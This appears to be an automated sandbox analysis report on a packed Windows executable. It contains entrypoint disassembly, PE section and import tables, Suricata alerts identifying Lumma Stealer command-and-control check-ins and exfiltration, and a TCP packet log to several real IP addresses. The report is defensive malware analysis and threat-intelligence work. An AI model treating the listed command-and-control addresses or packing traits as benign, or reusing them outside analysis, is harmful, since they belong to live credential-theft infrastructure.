Entrypoint Preview

Instruction
jmp 00007F6E9CD7DE4Ah
hint_nop dword ptr [00000000h]
add cl, ch
add byte ptr [eax], ah
add byte ptr [eax], al
add byte ptr [edx+ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
and al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [eax+00000000h], eax
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x54059	0x6d	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x541f8	0x8	.idata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x52000	0x26400	d2733744a91b021e07fe3f9a268e8aee	False	0.9995340584150327	data	7.984225369393261	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x53000	0x1000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x54000	0x1000	0x200	39a711a7d804ccbc2a14eea65cf3c27e	False	0.154296875	data	1.0789976601211375	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
wzqvdwrs	0x55000	0x2ab000	0x2aa200	260d4914647fde2074b977e7e8e9a026	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
prwatoro	0x300000	0x1000	0x600	b7accb74adda1702635aaeaea7ac7ca7	False	0.5768229166666666	data	4.969410985943299	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x301000	0x3000	0x2200	b3b93e2d165c834534133ffb0f5c647d	False	0.058823529411764705	DOS executable (COM)	0.7479462517610931	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Imports

DLL	Import
kernel32.dll	lstrcpy

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-24T08:53:46.118857+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49699	172.67.199.72	443	TCP
2024-12-24T08:53:46.979308+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.7	49699	172.67.199.72	443	TCP
2024-12-24T08:53:46.979308+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49699	172.67.199.72	443	TCP
2024-12-24T08:53:48.234613+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49700	172.67.199.72	443	TCP
2024-12-24T08:53:48.991999+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.7	49700	172.67.199.72	443	TCP
2024-12-24T08:53:48.991999+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49700	172.67.199.72	443	TCP
2024-12-24T08:53:50.633552+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49701	172.67.199.72	443	TCP
2024-12-24T08:53:51.660915+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.7	49701	172.67.199.72	443	TCP
2024-12-24T08:53:53.158061+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49703	172.67.199.72	443	TCP
2024-12-24T08:53:56.077083+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49709	172.67.199.72	443	TCP
2024-12-24T08:53:59.099876+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49715	172.67.199.72	443	TCP
2024-12-24T08:54:02.464413+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49728	172.67.199.72	443	TCP
2024-12-24T08:54:07.675569+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49740	172.67.199.72	443	TCP
2024-12-24T08:54:08.422948+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.7	49740	172.67.199.72	443	TCP
2024-12-24T08:54:10.004695+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49746	185.166.143.50	443	TCP
2024-12-24T08:54:12.262003+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.7	49752	52.217.14.36	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 24, 2024 08:53:44.891331911 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:44.891360044 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:44.891498089 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:44.895097971 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:44.895107985 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.118788004 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.118856907 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.122759104 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.122772932 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.123246908 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.166745901 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.232635021 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.232660055 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.232785940 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.979322910 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.979449034 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:46.979509115 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.996361971 CET	49699	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:46.996412039 CET	443	49699	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:47.019730091 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:47.019768953 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:47.019830942 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:47.021239042 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:47.021260023 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.234448910 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.234612942 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.235765934 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.235775948 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.236114025 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.237298965 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.237422943 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.237451077 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992001057 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992074013 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992116928 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.992132902 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992145061 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992181063 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.992206097 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992310047 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:48.992351055 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:48.992360115 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.000195980 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.000247955 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.000257969 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.008574009 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.008619070 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.008625984 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.057368040 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.057379961 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.104248047 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.183923960 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.186541080 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.186597109 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.186634064 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.194098949 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.194144964 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.194267988 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.194292068 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.194302082 CET	49700	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.194308996 CET	443	49700	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.418582916 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.418648005 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:49.418716908 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.419023991 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:49.419060946 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:50.633418083 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:50.633552074 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:50.634875059 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:50.634891033 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:50.635232925 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:50.636410952 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:50.636554956 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:50.636594057 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:51.660928965 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:51.661031008 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:51.661107063 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:51.719177961 CET	49701	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:51.719233036 CET	443	49701	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:51.934237957 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:51.934320927 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:51.934407949 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:51.934835911 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:51.934870958 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:53.157938957 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:53.158061028 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:53.159269094 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:53.159300089 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:53.159641981 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:53.161000967 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:53.161161900 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:53.161210060 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:53.161267042 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:53.207333088 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:54.093153000 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:54.093265057 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:54.093352079 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:54.119184971 CET	49703	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:54.119252920 CET	443	49703	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:54.863816977 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:54.863857985 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:54.863970041 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:54.864418983 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:54.864432096 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:56.076950073 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:56.077083111 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:56.078433037 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:56.078448057 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:56.078692913 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:56.083067894 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:56.083235979 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:56.083272934 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:56.083360910 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:56.083370924 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:57.042433023 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:57.042562008 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:57.042643070 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:57.042794943 CET	49709	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:57.042819977 CET	443	49709	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:57.886416912 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:57.886478901 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:57.886545897 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:57.886972904 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:57.886989117 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.099792004 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.099875927 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.101227999 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.101243019 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.101583004 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.102925062 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.103019953 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.103028059 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.879415989 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.879511118 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:53:59.879559040 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.880326033 CET	49715	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:53:59.880342007 CET	443	49715	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:01.252053022 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:01.252088070 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:01.252170086 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:01.252491951 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:01.252506018 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.464350939 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.464412928 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.465693951 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.465703011 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.465948105 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.472757101 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.473555088 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.473640919 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.473892927 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.473928928 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.474029064 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474087954 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.474227905 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474256992 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.474427938 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474456072 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.474622965 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474656105 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.474663973 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474811077 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.474839926 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.515332937 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.515496016 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.515538931 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.515551090 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.563334942 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.563714027 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.563766956 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.563807011 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.607337952 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.607546091 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:02.655329943 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:02.714299917 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:06.087182999 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:06.087266922 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:06.087333918 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:06.093312979 CET	49728	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:06.093344927 CET	443	49728	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:06.303952932 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:06.304008961 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:06.304074049 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:06.304656982 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:06.304670095 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:07.675497055 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:07.675569057 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:07.678704977 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:07.678711891 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:07.678981066 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:07.687598944 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:07.687625885 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:07.687664986 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:08.422941923 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:08.423058987 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:08.423125982 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:08.423358917 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:08.423386097 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:08.423398972 CET	49740	443	192.168.2.7	172.67.199.72
Dec 24, 2024 08:54:08.423404932 CET	443	49740	172.67.199.72	192.168.2.7
Dec 24, 2024 08:54:08.616997004 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:08.617043972 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:08.617116928 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:08.617461920 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:08.617480040 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.004623890 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.004694939 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.006314993 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.006325960 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.006618023 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.007972002 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.051330090 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.689908028 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.689927101 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.690026999 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.690150976 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.690386057 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.690402031 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.690412998 CET	49746	443	192.168.2.7	185.166.143.50
Dec 24, 2024 08:54:10.690419912 CET	443	49746	185.166.143.50	192.168.2.7
Dec 24, 2024 08:54:10.847963095 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:10.847989082 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:10.848064899 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:10.848432064 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:10.848443985 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.261936903 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.262002945 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.264245033 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.264257908 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.264504910 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.266288042 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.311333895 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.749788046 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.791913986 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.800044060 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.800052881 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.800087929 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.800122023 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.800163984 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.800179958 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.800205946 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.800249100 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.977498055 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.977524042 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.977631092 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.977662086 CET	443	49752	52.217.14.36	192.168.2.7
Dec 24, 2024 08:54:12.977710962 CET	49752	443	192.168.2.7	52.217.14.36
Dec 24, 2024 08:54:12.985055923 CET	443	49752	52.217.14.36	192.168.2.7
